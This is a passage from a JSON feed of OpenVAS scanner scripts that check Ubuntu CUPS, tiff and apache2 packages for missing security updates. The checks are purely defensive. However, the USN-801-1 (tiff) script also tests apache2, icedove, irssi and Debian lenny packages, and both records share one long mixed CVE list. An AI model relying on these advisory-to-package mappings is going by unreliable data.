rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcups2\", ver:\"1.3.9-2ubuntu9.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-gnutls10\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.2.2-0ubuntu0.6.06.13\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.2-1ubuntu7.10\", rls:\"UBUNTU7.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-common\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-bsd\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys-client\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"cupsys\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsimage2\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2-dev\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcupsys2\", ver:\"1.3.7-1ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:10", "description": "The remote host is missing an update to tiff\nannounced via advisory USN-801-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-801-1 (tiff)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2347", "CVE-2008-0196", "CVE-2009-1185", "CVE-2009-0034", "CVE-2009-0858", "CVE-2009-2334", "CVE-2009-1424", "CVE-2009-0772", "CVE-2009-0773", "CVE-2009-1422", "CVE-2009-0352", "CVE-2009-0040", "CVE-2009-0652", "CVE-2009-1838", "CVE-2009-1832", "CVE-2009-2285", "CVE-2009-2295", "CVE-2009-0771", "CVE-2009-1392", "CVE-2009-0774", "CVE-2008-2327", "CVE-2009-1890", "CVE-2009-0037", "CVE-2009-2335", "CVE-2009-1836", "CVE-2009-2336", "CVE-2009-0353", "CVE-2009-0776", "CVE-2009-1841", "CVE-2009-1423", "CVE-2009-1302", "CVE-2009-1891", "CVE-2009-1307", "CVE-2009-1303", "CVE-2009-1959", "CVE-2009-1425", "CVE-2009-2360"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64442", "href": "http://plugins.openvas.org/nasl.php?oid=64442", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_801_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_801_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-801-1 (tiff)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n libtiff4 3.7.4-1ubuntu3.6\n\nUbuntu 8.04 LTS:\n libtiff4 3.8.2-7ubuntu3.4\n\nUbuntu 8.10:\n libtiff4 3.8.2-11ubuntu0.8.10.3\n\nUbuntu 9.04:\n libtiff4 3.8.2-11ubuntu0.9.04.3\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-801-1\";\n\ntag_insight = \"Tielei Wang and Tom Lane discovered that the TIFF library did not correctly\nhandle certain malformed TIFF images. If a user or automated system were\ntricked into processing a malicious image, an attacker could execute\narbitrary code with the privileges of the user invoking the program.\";\ntag_summary = \"The remote host is missing an update to tiff\nannounced via advisory USN-801-1.\";\n\n \n\n\nif(description)\n{\n script_id(64442);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-2347\", \"CVE-2009-1890\", \"CVE-2009-1891\", \"CVE-2008-2327\", \"CVE-2009-2285\", \"CVE-2009-2295\", \"CVE-2009-0858\", \"CVE-2009-2334\", \"CVE-2009-2335\", \"CVE-2009-2336\", \"CVE-2008-0196\", \"CVE-2009-2360\", \"CVE-2009-0040\", \"CVE-2009-0352\", \"CVE-2009-0353\", \"CVE-2009-0652\", \"CVE-2009-0771\", \"CVE-2009-0772\", \"CVE-2009-0773\", \"CVE-2009-0774\", \"CVE-2009-0776\", \"CVE-2009-1302\", \"CVE-2009-1303\", \"CVE-2009-1307\", \"CVE-2009-1832\", \"CVE-2009-1392\", \"CVE-2009-1836\", \"CVE-2009-1838\", \"CVE-2009-1841\", \"CVE-2009-1185\", \"CVE-2009-0034\", \"CVE-2009-0037\", \"CVE-2009-1422\", \"CVE-2009-1423\", \"CVE-2009-1424\", \"CVE-2009-1425\", \"CVE-2009-1959\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-801-1 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-801-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.7.4-1ubuntu3.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.8.2-7ubuntu3.4\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.8.2-11ubuntu0.8.10.3\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4-dev\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff4\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiffxx0c2\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"3.8.2-11ubuntu0.9.04.3\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.55-4ubuntu2.6\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.8-1ubuntu0.10\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.9-7ubuntu3.2\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-src\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-event\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2.2-common\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec-custom\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-suexec\", ver:\"2.2.11-2ubuntu2.2\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml-doc\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml-dev\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcamlimages-ocaml\", ver:\"2.2.0-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnscache-run\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"djbdns\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dbndns\", ver:\"1.05-4+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sork-passwd-h3\", ver:\"3.0-2+lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-gnome-support\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"2.0.0.22-0lenny1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-text\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.10-1ubuntu1.1\", rls:\"UBUNTU6.06 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-3ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-3ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-4ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-4ubuntu2.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi-dev\", ver:\"0.8.12-6ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irssi\", ver:\"0.8.12-6ubuntu1.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:53", "description": "The remote host is missing an update to apache2\nannounced via advisory USN-802-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Ubuntu USN-802-1 (apache2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2347", "CVE-2008-0196", "CVE-2009-1185", "CVE-2009-0034", "CVE-2009-0858", "CVE-2009-2334", "CVE-2009-1424", "CVE-2009-0772", "CVE-2009-0773", "CVE-2009-1422", "CVE-2009-0352", "CVE-2009-0040", "CVE-2009-0652", "CVE-2009-1838", "CVE-2009-1832", "CVE-2009-2285", "CVE-2009-2295", "CVE-2009-0771", "CVE-2009-1392", "CVE-2009-0774", "CVE-2008-2327", "CVE-2009-1890", "CVE-2009-0037", "CVE-2009-2335", "CVE-2009-1836", "CVE-2009-2336", "CVE-2009-0353", "CVE-2009-0776", "CVE-2009-1841", "CVE-2009-1423", "CVE-2009-1302", "CVE-2009-1891", "CVE-2009-1307", "CVE-2009-1303", "CVE-2009-1959", "CVE-2009-1425", "CVE-2009-2360"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:64443", "href": "http://plugins.openvas.org/nasl.php?oid=64443", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_802_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_802_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-802-1 (apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 6.06 LTS:\n apache2-common 2.0.55-4ubuntu2.6\n apache2-mpm-perchild 2.0.55-4ubuntu2.6\n apache2-mpm-prefork 2.0.55-4ubuntu2.6\n apache2-mpm-worker 2.0.55-4ubuntu2.6\n libapr0 2.0.55-4ubuntu2.6\n\nUbuntu 8.04 LTS:\n apache2-mpm-event 2.2.8-1ubuntu0.10\n apache2-mpm-perchild 